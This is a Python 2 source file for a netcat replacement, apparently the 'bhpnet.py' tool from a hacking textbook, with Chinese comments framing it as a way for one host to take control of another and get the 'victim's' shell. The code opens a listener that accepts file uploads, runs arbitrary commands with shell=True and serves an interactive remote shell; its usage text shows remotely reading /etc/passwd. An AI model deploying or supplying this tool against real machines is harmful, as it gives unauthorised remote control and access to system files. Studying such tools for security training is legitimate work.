#!/opt/local/bin/python2.7 #coding=utf-8 ''' 取代netcat 两台主机中其中一台控制另一台 得到北控方的shell ''' import sys import socket import getopt import threading import subprocess # 定义一些全局变量 listen = False command = False upload = False execute = "" target = "" upload_destination = "" port = 0 # this runs a command and returns the output def run_command(command): # trim the newline command = command.rstrip() # run the command and get the output back try: output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True) except: output = "Failed to execute command. " # send the output back to the client return output # 这里会完成上传、执行shell命令、反弹shell的操作 控制方 def client_handler(client_socket): global upload global execute global command # 检查是不是要求上传文件 if len(upload_destination): # read in all of the bytes and write to our destination file_buffer = "" #持续接收数据 while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data #将接收到的数据写到文件中 try: file_descriptor = open(upload_destination,"wb") file_descriptor.write(file_buffer) file_descriptor.close() # acknowledge that we wrote the file out client_socket.send("Successfully saved file to %s " % upload_destination) except: client_socket.send("Failed to save file to %s " % upload_destination) # 检查是不是要向目标发送shell语句 if len(execute): # run the command output = run_command(execute) client_socket.send(output) # 检查是不是要得到目标的shell if command: while True: # show a simple prompt client_socket.send("<受害者:#> ") # 接收返还的结果 cmd_buffer = "" while " " not in cmd_buffer: cmd_buffer += client_socket.recv(1024) # we have a valid command so execute it and send back the results response = run_command(cmd_buffer) # send back the response client_socket.send(response) # this is for incoming connections def server_loop(): global target global port # if no target is defined we listen on all interfaces if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.bind((target,port)) server.listen(5) while True: client_socket, addr = server.accept() # spin off a thread to handle our new client client_thread = threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start() # if we don't listen we are a client....make it so. def client_sender(buffer): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # connect to our target host client.connect((target,port)) # if we detect input from stdin send it # if not we are going to wait for the user to punch some in if len(buffer): client.send(buffer) while True: # now wait for data back recv_len = 1 response = "" while recv_len: data = client.recv(4096) recv_len = len(data) response+= data if recv_len < 4096: break print response, # wait for more input buffer = raw_input("") buffer += " " # send it off client.send(buffer) except: # just catch generic errors - you can do your homework to beef this up print "[*] Exception! Exiting." # teardown the connection client.close() # 列出一些标签 def usage(): print "Netcat Replacement" print print "Usage: bhpnet.py -t target_host -p port" print "-l --listen - listen on [host]:[port] for incoming connections" print "-e --execute=file_to_run - execute the given file upon receiving a connection" print "-c --command - initialize a command shell" print "-u --upload=destination - upon receiving connection upload a file and write to [destination]" print print print "Examples: " print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\target.exe" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"" print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135" sys.exit(0) def main(): ''' 引用全局变量 :return: ''' global listen global port global execute global command global upload_destination global target ''' 检查是否输入了参数 ''' if not len(sys.argv[1:]): usage() # 接收控制参数 try: opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ("-h","--help"): usage() elif o in ("-l","--listen"): listen = True elif o in ("-e", "--execute"): execute = a elif o in ("-c", "--commandshell"): command = True elif o in ("-u", "--upload"): upload_destination = a elif o in ("-t", "--target"): target = a elif o in ("-p", "--port"): port = int(a) else: assert False,"Unhandled Option" # 检查是不是控制方,并且参数有没有输入 # 如果是被控方 if not listen and len(target) and port > 0: ''' read in the buffer from the commandline this will block, so send CTRL-D if not sending input to stdin ''' buffer = sys.stdin.read() ''' 开始向被控方发送指令 send data off ''' client_sender(buffer) ''' 如果是控制方 we are going to listen and potentially upload things, execute commands and drop a shell back depending on our command line options above ''' if listen: # 执行 server_loop() if __name__ == '__main__': main()